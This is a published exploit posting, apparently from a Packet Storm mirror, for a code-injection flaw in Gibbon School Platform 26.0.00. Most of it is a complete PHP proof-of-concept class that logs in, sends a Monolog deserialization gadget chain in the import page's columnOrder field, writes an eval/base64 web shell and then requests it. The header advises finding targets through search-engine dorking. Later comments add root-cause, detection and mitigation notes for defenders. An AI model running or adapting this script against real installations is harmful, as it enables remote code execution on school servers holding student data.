## https://sploitus.com/exploit?id=PACKETSTORM:182149
=============================================================================================================================================  
| # Title : Gibbon School Platform 26.0.00 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://gibbonedu.org/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engine.  
  
[+] Uses cURL to send the requests that allow remote command execution.  
  
[+] Line 108 set your target .  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php  
  
[+] PayLoad :  
  
  
<?php  
  
/**
 * Proof-of-concept client for the Gibbon import-form issue this advisory describes
 * (the author lists 26.0.00 as the tested version).
 *
 * Flow visible in this class: log in, POST a PHP-serialized object graph in the
 * `columnOrder` field of the System Admin import page (step 4), then request a
 * .php file that the payload is meant to create.
 *
 * Defender notes:
 * - Root cause is presumably an unserialize() of the `columnOrder` request field on
 *   the server; confirm against the Gibbon source. The fix class is to stop
 *   deserializing request data (JSON instead, or unserialize() with
 *   ['allowed_classes' => false]) and to run a vendor release that addresses it.
 * - Detection: POSTs to import_run.php whose `columnOrder` value contains serialized
 *   object markers (`O:<len>:"Monolog\Handler\...`), newly created .php files whose
 *   name is 10 ASCII letters, and files containing `@eval(base64_decode(`.
 */
class GibbonExploit  
{  
// Base URL of the Gibbon installation; paths are appended to it without normalisation.
private $target_uri;  
// Account name sent to login.php.
private $username;  
// Account password sent to login.php.
private $password;  
// File name the payload writes and execute_php() later requests.
private $webshell_name;  
  
/**
 * Stores the connection settings.
 *
 * @param string      $target_uri    Base URL of the installation.
 * @param string      $username      Account used for the login request.
 * @param string      $password      Password for that account.
 * @param string|null $webshell_name Name of the file to create; any falsy value
 *                                   (the `?:` test) is replaced by a random
 *                                   10-letter name with a .php suffix.
 */
public function __construct($target_uri, $username, $password, $webshell_name = null)  
{  
$this->target_uri = $target_uri;  
$this->username = $username;  
$this->password = $password;  
$this->webshell_name = $webshell_name ?: $this->randomString() . '.php';  
}  
  
/**
 * Issues one HTTP request through cURL on a handle created for this call.
 *
 * @param string            $method  HTTP verb, set via CURLOPT_CUSTOMREQUEST.
 * @param string            $url     Absolute URL to request.
 * @param string|array|null $data    Request body; skipped when falsy.
 * @param array             $headers Extra header lines; skipped when empty.
 *
 * @return string|bool Response body, or false when curl_exec() fails. The HTTP
 *                     status code is not inspected.
 */
private function send_request($method, $url, $data = null, $headers = [])  
{  
$ch = curl_init();  
  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
if ($data) {  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
// Return the body as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
// Peer certificate verification is switched off, so any TLS certificate is accepted.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
  
if (!empty($headers)) {  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
}  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
return $response;  
}  
  
/**
 * Posts the stored credentials to login.php.
 *
 * The school-year and language identifiers are hard-coded. Nothing here checks
 * whether the login was accepted.
 *
 * @return string|bool Raw response from send_request().
 */
public function gibbon_login()  
{  
$login_url = $this->target_uri . '/login.php?timeout=true';  
$data = [  
'address' => '',  
'method' => 'default',  
'username' => $this->username,  
'password' => $this->password,  
'gibbonSchoolYearID' => '025',  
'gibboni18nID' => '0002'  
];  
  
return $this->send_request('POST', $login_url, http_build_query($data));  
}  
  
/**
 * Builds the form fields for the import page, with a serialized object graph in
 * `columnOrder`.
 *
 * The graph names Monolog\Handler\SyslogUdpHandler and Monolog\Handler\BufferHandler,
 * places $payload in the buffered record, and lists "current" and "system" as
 * processors. NOTE(review): this looks like the publicly documented Monolog
 * handler/processor deserialization pattern, where processors run as callables over
 * the record when the buffer is flushed -- confirm against the Monolog version that
 * Gibbon bundles.
 *
 * Defender note: a legitimate import would not be expected to send object markers
 * in `columnOrder`, so `O:` followed by a class name in that field is a strong
 * signal for WAF or log rules -- TODO confirm the legitimate format.
 *
 * @param string $payload Command line embedded in the serialized record.
 *
 * @return array Form fields, not yet URL-encoded.
 */
private function construct_form_data($payload)  
{  
// Serialized strings are declared as s:<byte length>, hence strlen() and not mb_strlen().
$payload_len = strlen($payload);  
$payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';  
  
$form_data = [  
'address' => '/modules/System Admin/import_run.php',  
'mode' => 'sync',  
'syncField' => 'N',  
'syncColumn' => '',  
'columnOrder' => $payload_data,  
'columnText' => 'N;',  
'fieldDelimiter' => '%2C',  
'stringEnclosure' => '%22',  
'filename' => $this->randomString() . '.xlsx',  
'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',  
'ignoreErrors' => '1',  
'Failed' => 'Submit'  
];  
  
return $form_data;  
}  
  
/**
 * Sends the import request whose payload is a shell `echo ... > <file>` line that
 * writes a one-line PHP file.
 *
 * The file name is relative, so where it lands depends on the working directory of
 * the process that runs the command; execute_php() assumes that is the web root.
 *
 * Defender note: the written file contains `@eval(base64_decode('...'))`, a common
 * web-shell signature that file-integrity monitoring and AV rules match on. A web
 * root that the PHP user cannot write to stops this step.
 *
 * @param string $b64_payload Base64 text placed inside the written file.
 *
 * @return string|bool Raw response from send_request().
 */
public function upload_webshell($b64_payload)  
{  
$php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;  
$form_data = $this->construct_form_data($php_payload);  
  
$url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';  
return $this->send_request('POST', $url, http_build_query($form_data));  
}  
  
/**
 * Base64-encodes $cmd, runs upload_webshell() with it, then requests the written file.
 *
 * The only failure check is for a falsy upload response; whether the file was
 * actually created is not verified before the GET.
 *
 * @param string $cmd PHP source to embed, base64-encoded, in the written file.
 *
 * @return string|bool Body of the GET response, or false on transport failure.
 */
public function execute_php($cmd)  
{  
$b64_payload = base64_encode($cmd);  
$res = $this->upload_webshell($b64_payload);  
  
if (!$res) {  
die('Web shell upload error.');  
}  
  
// Request the file by its name directly under the base URL.
$url = $this->target_uri . '/' . $this->webshell_name;  
return $this->send_request('GET', $url);  
}  
  
/**
 * Returns the first $length characters of a shuffled A-Z/a-z alphabet.
 *
 * Each letter appears at most once and the result is capped at 52 characters.
 * str_shuffle() is not a cryptographically secure source.
 *
 * @param int $length Number of letters wanted.
 *
 * @return string Letters only, no digits.
 */
private function randomString($length = 10)  
{  
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);  
}  
}  
  
// Usage: the URL and credentials below are the PoC's placeholders.
// The script logs in before sending the import request, which suggests the import
// page needs an authenticated session (it sits under System Admin) -- confirm.
// Defender note: if so, restricting and auditing System Admin access narrows exposure.
$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');  
// The login response is discarded; a failed login is not detected here.
$exploit->gibbon_login();  
// phpinfo() is the demonstration command; its output is printed as returned.
$response = $exploit->execute_php('phpinfo();');  
echo $response;  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================